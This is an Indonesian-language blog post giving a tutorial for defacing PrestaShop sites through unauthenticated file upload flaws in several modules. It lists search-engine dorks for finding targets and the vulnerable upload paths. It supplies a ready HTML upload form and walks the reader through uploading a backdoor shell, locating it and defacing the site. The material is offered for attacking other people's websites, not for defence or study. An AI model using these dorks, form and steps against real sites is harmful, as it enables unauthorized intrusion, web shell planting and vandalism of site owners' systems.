Hello gengs, kali ini saya Mau Share Tutorial Untuk Deface Terbaru Nih , Maksudnya Tutorial Ini Saya Baru Tau :v
Oke langsung saja , nyari bahan bahan buat di pepes entar pake kata kata mutiara dibawah ini.
Dork :
Inurl:"/modules/columnadverts/"
Inurl:"/modules/homepageadvertise/"
Inurl:"/modules/productpageadverts/"
Inurl:"/modules/simpleslideshow/"
Inurl:"/modules/vtemslideshow/"
Index Of "/modules/columnadverts/"
Index Of "/modules/homepageadvertise/"
Index Of "/modules/productpageadverts/"
Index Of "/modules/simpleslideshow/"
Index Of "/modules/vtemslideshow/"
Exploit
http://loclahost/ modules/columnadverts/uploadimage.php
http://localhost/ modules/homepageadvertise/uploadimage.php
http://localhost/ modules/productpageadverts/uploadimage.php
http://localhost/ modules/simpleslideshow/uploadimage.php
http://localhost/ modules/vtemslideshow/uploadimage.php
CSRF :
<form method="POST" action="http://localhost/modules/modules name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
Langsung Ke Tutorialnya.... :*
1. Cari Target Menggunakan Dork !
2. Pilih Salah Satu Situs Yang Ingin Di buat Pepes :v
3. Tambakan Exploit Setelah Url :*
http://localhost/ Exploitnya Pilih Satu Persatu !
Jika Vuln Tampilanya Akan Seperti Ini !
4. Copy CSRF Yang Ada Di Atas Tadi :*
Jangan Lupa Edit Dulu CSRF Tersebut .
Localhost > Website Target .
Modules Name > Nama Exploit Yang Tadi Vuln .
Lalu Simpan Dengan Ex.HTML > All Files
5. Buka CSRF Tersebut , Upload Shell Backdoor Kamu :*
Jika Berhasil Akan Terlihat Seperti Ini
6. Dan Sekarang Lihat Letak Shell Nya
http://localhost/modules/modules name/slides/Name_Shell.php
Kalau Sudah Ketemu Shellnya terserah mau dibuat apain, jangan lupa dikasi Makaso biar syedaapp.
0 Response to "Deface Teknik Prestashop File Upload"
Post a Comment